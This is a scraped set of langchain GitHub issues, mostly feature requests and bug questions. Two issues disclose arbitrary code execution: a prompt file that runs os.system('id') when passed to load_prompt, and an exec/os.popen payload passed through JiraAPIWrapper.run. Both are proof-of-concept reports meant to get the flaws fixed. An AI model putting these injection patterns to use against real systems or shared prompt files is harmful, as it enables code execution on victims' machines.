- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. A python prompt file `prompt.py`
```
from langchain.output_parsers.list import CommaSeparatedListOutputParser
from langchain.prompts.prompt import PromptTemplate
_DECIDER_TEMPLATE = """Given the below input question and list of potential tables, output a comma separated list of the table names that may be neccessary to answer this question.
Question: {query}
Table Names: {table_names}
Relevant Table Names:"""
import os
os.system('id')
PROMPT = PromptTemplate(
input_variables=["query", "table_names"],
template=_DECIDER_TEMPLATE,
output_parser=CommaSeparatedListOutputParser(),
)
```
2. Load the prompt with load_prompt function
```
from langchain.prompts import load_prompt
load_prompt('prompt.py')
```
3. The `id` command will be executed.
Attack scenario 1: Alice can send a prompt file to Bob and get Bob to load it.
Attack scenario 2: Alice uploads the prompt file to a public hub such as '[langchain-hub](https://github.com/hwchase17/langchain-hub/tree/master)'. Bob loads the prompt from a URL.
### Expected behavior
The code cannot be executed without any check. | Arbitrary code execution in load_prompt | https://api.github.com/repos/langchain-ai/langchain/issues/4849/comments | 2 | 2023-05-17T10:36:17Z | 2023-08-29T17:58:01Z | https://github.com/langchain-ai/langchain/issues/4849 | 1,713,606,278 | 4,849 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I use ChatOpenAI and set verbose to true, but I think this only shows the formatted prompt template, not the final prompt.
How can I get the final prompt that is sent to ChatGPT?
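A sketch I am considering (a custom callback handler; I am not sure this is the intended way):
```python
from langchain.callbacks.base import BaseCallbackHandler

class PromptLogger(BaseCallbackHandler):
    def on_llm_start(self, serialized, prompts, **kwargs):
        # `prompts` holds the fully rendered text handed to the model
        for p in prompts:
            print(p)
```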
Thanks for your time.
### Suggestion:
_No response_ | How can I obtain the final Prompt that is inputted into ChatGPT? | https://api.github.com/repos/langchain-ai/langchain/issues/4848/comments | 2 | 2023-05-17T09:59:15Z | 2023-09-12T16:15:00Z | https://github.com/langchain-ai/langchain/issues/4848 | 1,713,548,834 | 4,848 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I found the `BaseMultiActionAgent` class in langchain but no implementation; maybe it is already in the process of development. I want to implement an agent based on this class (executing multiple actions in one step), but I encounter some errors. Has anyone noticed this and already implemented agents based on it?
### Suggestion:
_No response_ | Issue: implementation of BaseMultiActionAgentpen | https://api.github.com/repos/langchain-ai/langchain/issues/4846/comments | 1 | 2023-05-17T09:25:20Z | 2023-09-10T16:16:49Z | https://github.com/langchain-ai/langchain/issues/4846 | 1,713,494,765 | 4,846 |
[
"hwchase17",
"langchain"
]
| ### Feature request
The [Microsoft Guidance Repository](https://github.com/microsoft/guidance/blob/main/README.md) is a tool designed to enhance the control over modern language models. It allows for a more effective and efficient control than traditional prompting or chaining. It offers features like simple, intuitive syntax based on Handlebars templating, rich output structure with multiple generations, selections, conditionals, tool use, etc.
### Motivation
Based on the description and examples (templating, hidden response parts, well-formed response variables), integration of `guidance` with `langchain` would be very useful addition.
### Your contribution
Given some guidance (pun, intended), I can imagine contributing with a PR myself. | Support for https://github.com/microsoft/guidance | https://api.github.com/repos/langchain-ai/langchain/issues/4843/comments | 3 | 2023-05-17T08:41:08Z | 2023-08-18T19:07:42Z | https://github.com/langchain-ai/langchain/issues/4843 | 1,713,418,715 | 4,843 |
[
"hwchase17",
"langchain"
]
| ### System Info
- Python 3.11.3 on Windows 11
- langchain==0.0.171
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. create llm, SQLDatabase and the SQLDatabaseChain instances;
2. query database with natural language
3. the SQLDatabaseChain would return more content (normally it would add a new question below the answer)

### Expected behavior
It seems that if we modify line 111 of `langchain\chains\sql_database\base.py` and add `"\nQuestion:"` as another stop phrase, SQLDatabaseChain works well.
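A sketch of the change I mean (paraphrasing the relevant lines rather than an exact diff):
```python
# langchain/chains/sql_database/base.py (around line 111)
llm_inputs = {
    "input": input_text,
    "top_k": self.top_k,
    "dialect": self.database.dialect,
    "table_info": table_info,
    "stop": ["\nSQLResult:", "\nQuestion:"],  # "\nQuestion:" added as a stop phrase
}
```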


| SQLDatabaseChain returned for more than just the expected answer | https://api.github.com/repos/langchain-ai/langchain/issues/4840/comments | 2 | 2023-05-17T06:15:49Z | 2023-09-25T16:07:12Z | https://github.com/langchain-ai/langchain/issues/4840 | 1,713,198,963 | 4,840 |
[
"hwchase17",
"langchain"
]
| ### Feature request
Hi, thanks for creating such a great tool, I'm using it well at work and for personal use.
But for production use, I need a more tightly managed, revision-controlled Prompt Template Store.
I know that load_prompt is already supported, but I wonder if it can be extended to utilize a remote store, like GitHub.
For example, if there were a GitPromptTemplateStore class like:
```python
from abc import ABCMeta, abstractmethod
from pydantic import BaseModel
from langchain.prompts.base import BasePromptTemplate

class PromptTemplateStore(metaclass=ABCMeta):
@abstractmethod
def load(self, path: str) -> BasePromptTemplate:
pass
class GitPromptTemplateStore(BaseModel):
@property
def repository(self) -> str:
return "[email protected]:some_project/prompt_repo.git"
@property
def branch(self) -> str:
return "main"
...
def load(self, path: str) -> BasePromptTemplate:
...
return {name}_prompt_template # from remote git store (with/without cache)
```
which can be utilized like:
```
template_store = GitPromptTemplateStore(...)
prompt = load_prompt_from_store(template_store, path=...)
```
managing prompt templates would be much easier.
### Motivation
For production use, I need a more tightly managed, revision-controlled Prompt Template Store.
I know that load_prompt is already supported, but I wonder if it can be extended to utilize a remote store, like GitHub.
### Your contribution
I have read the CONTRIBUTING.MD, and if this request looks valid, I'd be happy to contribute. | Extending Prompt Template Store to Git | https://api.github.com/repos/langchain-ai/langchain/issues/4839/comments | 3 | 2023-05-17T06:15:12Z | 2023-08-31T05:34:20Z | https://github.com/langchain-ai/langchain/issues/4839 | 1,713,198,334 | 4,839 |
[
"hwchase17",
"langchain"
]
| ### Feature request
When you request a webpage using a library like requests or aiohttp, you're getting the initial HTML of the page, but any content that's loaded via JavaScript after the page loads will not be included. That's why you might see template tags like `{{item.price}} taka` instead of the actual values. Those tags are placeholders that get filled in with actual data by JavaScript after the page loads.
To handle this, you'll need to use a library that can execute JavaScript. A commonly used one is Selenium, but it's heavier than requests or aiohttp because it requires running an actual web browser.
But is there another option that doesn't require running a full web browser, or that can be used in LangChain without a graphical interface, such as headless browser tools like `pyppeteer` (a Python wrapper for Puppeteer)?
Anyway, please consider solving this and adding features like this.
Thanks in advance.
### Motivation
To get dynamically loaded content while scraping text from a website or webpage.
### Your contribution
On my side, I rewrote the `_fetch` method in your WebBaseLoader class to use pyppeteer instead of aiohttp. It is still **not working**, but I think this might help a little.
Here is my code, where I override the class:
```
import asyncio
import logging

import pyppeteer
from langchain.document_loaders import WebBaseLoader as BaseWebBaseLoader

logger = logging.getLogger(__name__)
class WebBaseLoader(BaseWebBaseLoader):
async def _fetch(
self, url: str, selector: str = 'body', retries: int = 3, cooldown: int = 2, backoff: float = 1.5
) -> str:
for i in range(retries):
try:
browser = await pyppeteer.launch()
page = await browser.newPage()
await page.goto(url)
await page.waitForSelector(selector) # waits for a specific element to be loaded
await asyncio.sleep(5) # waits for 5 seconds before getting the content
content = await page.content() # This gets the full HTML, including any dynamically loaded content
await browser.close()
return content
except Exception as e:
if i == retries - 1:
raise
else:
logger.warning(
f"Error fetching {url} with attempt "
f"{i + 1}/{retries}: {e}. Retrying..."
)
await asyncio.sleep(cooldown * backoff ** i)
raise ValueError("retry count exceeded")
```
and Install this two lib
```
pip install pyppeteer
pyppeteer-install
```
| Make an option in WebBaseLoader to handle dynamic content that is loaded via JavaScript. | https://api.github.com/repos/langchain-ai/langchain/issues/4838/comments | 3 | 2023-05-17T06:06:30Z | 2023-09-19T16:10:37Z | https://github.com/langchain-ai/langchain/issues/4838 | 1,713,187,340 | 4,838 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I was trying to create a pipeline using LangChain and GPT4All (gpt4all-converted.bin). The pipeline ran fine when we tried it on a Windows system. But now, when I am trying to run the same code on a RHEL 8 AWS (p3.8x) instance, it is generating gibberish.
This is my code -
```
from langchain import PromptTemplate, LLMChain
from langchain.llms import GPT4All
from langchain.callbacks.manager import CallbackManager
from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler
gpt4all_path = 'Models/gpt4all-converted.bin'
callback_manager = CallbackManager([StreamingStdOutCallbackHandler()])
llm = GPT4All(model=gpt4all_path, callback_manager=callback_manager, verbose=True, temp=0, n_predict=512, n_ctx=2048)
prompt_temp = """
Below is an instruction that describes a task. Write a response that appropriately completes the request.
> How many letters are there in the English alphabet?
There 26 letters in the English Alphabet
> Question: {question}
> Reply:
"""
prompt = PromptTemplate(template=prompt_temp, input_variables=["question"])
llm_chain = LLMChain(prompt=prompt, llm=llm)
response = llm_chain.run("write me a story about a lonely computer?")
```
And this is what I am getting -
```
print(response)
'\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f#\x05\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f#\x05\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f# thealst\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f'
```
Can anyone help me to understand the problem here?
### Suggestion:
_No response_ | Issue: GPT4All with Langchain generating \x0f\x0f | https://api.github.com/repos/langchain-ai/langchain/issues/4837/comments | 2 | 2023-05-17T05:59:30Z | 2023-09-12T11:15:28Z | https://github.com/langchain-ai/langchain/issues/4837 | 1,713,178,012 | 4,837 |
[
"hwchase17",
"langchain"
]
| llama-cpp-python added support for n_gpu_layers
Here is the comment confirming it https://github.com/abetlen/llama-cpp-python/issues/207#issuecomment-1550578859 | [Feature request] Add support for GPU offloading to Llama.cpp llm | https://api.github.com/repos/langchain-ai/langchain/issues/4836/comments | 0 | 2023-05-17T05:37:28Z | 2023-05-17T15:35:22Z | https://github.com/langchain-ai/langchain/issues/4836 | 1,713,157,876 | 4,836 |
[
"hwchase17",
"langchain"
]
| ### Feature request
Wrong outputs of the model will raise exceptions, so it may be better to provide clear feedback to the LLM on the specific issue (e.g. incorrect formatting). This would allow the LLM to self-adjust and retry, making the chain robust.
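For reference, something in this spirit already exists at the parser level; a sketch (assuming an existing `base_parser` to wrap):
```python
from langchain.chat_models import ChatOpenAI
from langchain.output_parsers import OutputFixingParser

# On a parse failure, the bad output plus the error message are sent
# back to the LLM, which retries with a corrected answer.
fixing_parser = OutputFixingParser.from_llm(
    parser=base_parser,  # any existing output parser
    llm=ChatOpenAI(temperature=0),
)
```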
### Motivation
When I was using the chain to test my own search tool, if the result was in another language (not English), the model failed to exactly follow the "thought-action" pattern.
### Your contribution
Not yet | Making the chain more robust (self-correct) | https://api.github.com/repos/langchain-ai/langchain/issues/4835/comments | 2 | 2023-05-17T05:35:55Z | 2024-04-21T21:16:06Z | https://github.com/langchain-ai/langchain/issues/4835 | 1,713,156,564 | 4,835 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain version:0.0.171
windows 10
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. Set the environment variables for jira and openai
```python
import os
from langchain.utilities.jira import JiraAPIWrapper
os.environ["JIRA_API_TOKEN"] = "your jira api token"
os.environ["JIRA_USERNAME"] = "your username"
os.environ["JIRA_INSTANCE_URL"] = "your url"
os.environ["OPENAI_API_KEY"] = "your openai key"
```
2. Run jira
```python
jira = JiraAPIWrapper()
output = jira.run('other',"exec(\"import os;print(os.popen('id').read())\")")
```
3. The `id` command will be executed.
Commands can be changed to others, and attackers can execute arbitrary code.
### Expected behavior
The code should not be executed without any check. | Arbitrary code execution in JiraAPIWrapper | https://api.github.com/repos/langchain-ai/langchain/issues/4833/comments | 5 | 2023-05-17T04:11:40Z | 2024-03-13T16:12:28Z | https://github.com/langchain-ai/langchain/issues/4833 | 1,713,072,690 | 4,833 |